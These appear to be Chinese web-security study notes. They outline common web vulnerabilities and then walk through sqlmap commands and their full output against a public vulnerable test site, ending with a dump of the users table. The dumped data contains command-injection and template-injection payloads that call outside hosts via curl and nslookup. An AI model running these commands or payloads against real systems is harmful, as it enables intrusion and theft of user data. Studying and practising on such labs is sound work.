web安全入门

安全事件

• 钓鱼

• 篡改网页

• 暗链(拿到控制权，修改网页链接)

• webshell(拿到控制权，上传后门)

  

XSS

跨站脚本，Cross Site Script

危害：调取用户信息、钓鱼、制造蠕虫

XSS分类

• 存储型

  

  

• 反射型

  

• DOM型

CSRF

cross-site request forgery,跨站请求伪造

概念：利用用户已登陆的身份，在用户毫不知情的情况下，以用户的名义完成非法操作

危害：

• 执行恶意操作（被转帐、被发垃圾评论等）
• 制造蠕虫

CSRF原理分析

CSRF攻击代码

点击劫持

概念

通过覆盖不可见的框架误导受害者点击而造成的攻击行为

示例

对应源码

特点

URL跳转

概念

借助未验证的URL跳转，将应用程序引导到不安全的第三方区域，从而导致的安全问题。

跳转方式

• Header头跳转、

  

• JavaScript跳转

  

• META跳转

sql注入

sql injection

概念

一种常见的web安全漏洞，攻击者利用这个漏洞，可以访问或修改数据，或者利用潜在的数据库漏洞进行攻击

原理

一次sql注入过程

• 获取用户请求参数
• 拼接到代码当中
• sql语句按照我们构造参数的语句执行成功

sql必备条件

• 可以控制输入的数据
• 服务器要执行的代码拼接了控制的数据

sql本质

数据和代码未分离，即数据当作了代码来执行

sql注入利用

获取系统版本

获取当前数据库用户

sql注入危害

获取数据库信息

其他危害

命令注入解析

形象化引入

命令注入前提条件

拼接注入

文件操作类漏洞

隐患

文件上传漏洞

任意文件下载漏洞

可以尝试使用其他的url下载文件

任意文件下载漏洞危害

代码泄露、数据库配置文件泄露、系统文件泄露等

文件包含漏洞

示例

漏洞扫描工具

使用漏洞工具需要明确的问题

• 对目标站点的误伤

  如：高流量、请求了危险功能（如删除数据库）

• 漏洞扫描的盲区：逻辑漏洞

  如：订单金额数据篡改漏洞

漏洞评级问题

技术角度+业务角度

漏洞扫描结果的解读和运用

• 测试用例可能需要调正
• 误报和漏报
• 将扫描结果作为人工测试的线索

sql注入–sqlmap

发现和利用sql注入漏洞基本流程

sqlmap命令小技巧：字母缩写前一个-，完整单词是两个–

sql注入命令

发现注入点

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1"

查看用户

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users

查看有哪些数据库

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

查看当前用户和数据库

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user --current-db

返回信息

D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user --current-db
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:26:36 /2024-02-07/

[20:26:36] [INFO] resuming back-end DBMS 'mysql'
[20:26:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4968=4968

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:26:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[20:26:37] [INFO] fetching current user
current user: 'acuart@localhost'
[20:26:37] [INFO] fetching current database
current database: 'acuart'
[20:26:37] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:26:37 /2024-02-07/

查看当前数据库acuart中的数据表

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --tables -D "acuart"

返回信息

D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --tables -D "acuart"
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.2#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:30:00 /2024-02-07/

[20:30:00] [INFO] resuming back-end DBMS 'mysql'
[20:30:00] [INFO] testing connection to the target URL
[20:30:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4968=4968

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:30:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[20:30:01] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[20:30:01] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:30:01 /2024-02-07/

查询目标数据库中目标数据表的列信息

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T "users" -D "acuart"

D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T "users" -D "acuart"
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.2#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:32:59 /2024-02-07/

[20:32:59] [INFO] resuming back-end DBMS 'mysql'
[20:32:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4968=4968

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:33:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[20:33:00] [INFO] fetching columns for table 'users' in database 'acuart'
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| name    | varchar(100) |
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

[20:33:00] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:33:00 /2024-02-07/

查看多少条数据

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "users" -D "acuart"

D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "users" -D "acuart"
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8.2#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:38:15 /2024-02-07/

[20:38:16] [INFO] resuming back-end DBMS 'mysql'
[20:38:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4968=4968

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:38:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
Database: acuart
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 1       |
+-------+---------+

[20:38:16] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:38:16 /2024-02-07/

查看具体数据

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T "users" -D "acuart"

D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T "users" -D "acuart"
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.2#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:39:46 /2024-02-07/

[20:39:47] [INFO] resuming back-end DBMS 'mysql'
[20:39:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4968=4968

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:39:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[20:39:47] [INFO] fetching columns for table 'users' in database 'acuart'
[20:39:47] [INFO] fetching entries for table 'users' in database 'acuart'
[20:39:48] [INFO] recognized possible password hashes in column 'cart'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: acuart
Table: users
[1 entry]
+---------------------+----------------------------------+------+-----------------+-----------------------------------------------------------------------------------+-------+--------------+--------------------------------------------------------------------------------------------------------------------------------------------------+
| cc                  | cart                             | pass | email           | phone                                                                             | uname | name         | address                                                                                                                                          |
+---------------------+----------------------------------+------+-----------------+-----------------------------------------------------------------------------------+-------+--------------+--------------------------------------------------------------------------------------------------------------------------------------------------+
| 1234-5678-2300-9000 | aa1041771b89328ddd3e0dbba2069227 | test | email@email.com | `(nslookup -q=cname hitdfzklrjrow9d8f0.bxss.me||curl hitdfzklrjrow9d8f0.bxss.me)` | test  | Pedro Miguel | {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup 7170qtzuulqvxeuv-kkslifmkvdggunvafgi9sk0"~"deo.r87.me")}} |
+---------------------+----------------------------------+------+-----------------+-----------------------------------------------------------------------------------+-------+--------------+--------------------------------------------------------------------------------------------------------------------------------------------------+

[20:40:05] [INFO] table 'acuart.users' dumped to CSV file 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com\dump\acuart\users.csv'
[20:40:05] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:40:05 /2024-02-07/

products表有多少条数据

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "products" -D "acuart"

D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "products" -D "acuart"
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8.2#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:43:53 /2024-02-07/

[20:43:54] [INFO] resuming back-end DBMS 'mysql'
[20:43:54] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4968=4968

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:43:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
Database: acuart
+----------+---------+
| Table    | Entries |
+----------+---------+
| products | 3       |
+----------+---------+

[20:43:55] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:43:55 /2024-02-07/

查看products表中的数据，从第2条开始读，一直读到第3条为止

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T "products" -D "acuart" --start 2 --stop 3

下载acuart中所有表的数据

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump-all -D "acuart"

并保存在了下列文件夹中

C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com\dump\acuart

实现post，登录进去

python sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data="pass=g00dP&uname=1"

data引号里面的的数据可以通过awvs数据抓包得到

以上均是在测试站点下，在实际环境中，确定注入点以及基本的信息就可以了

敏感文件探测

敏感文件就像网站的秘密日记，如果没有保护好被访问者发现，就有可能暴露站点的脆弱性或保密数据

常见的敏感文件类型

• 网站管理后台
• 数据文件
• 备份文件
• Webshell

探测原理

猜测文件名，然后根据返回的HTTP状态码判断文件是否存在

http://tool.oschina.net/commons?type=5

问题一

php的站点用asp的字典去扫描没用

如何去判断常见网站脚本类型？asp、php、aspx、jsp等

答 ： 判断index的类型

问题二

每个网站都有所不同，通用的字典针对性差，命中率低，如何生成针对性的字典？

搜索引擎语法

• 想找到目标站点登录地址并且暴力破解密码

• 想查看目标站点有没有泄露数据库文件

网路空间搜索引擎

SHODAN ZoomEy FOFA

原理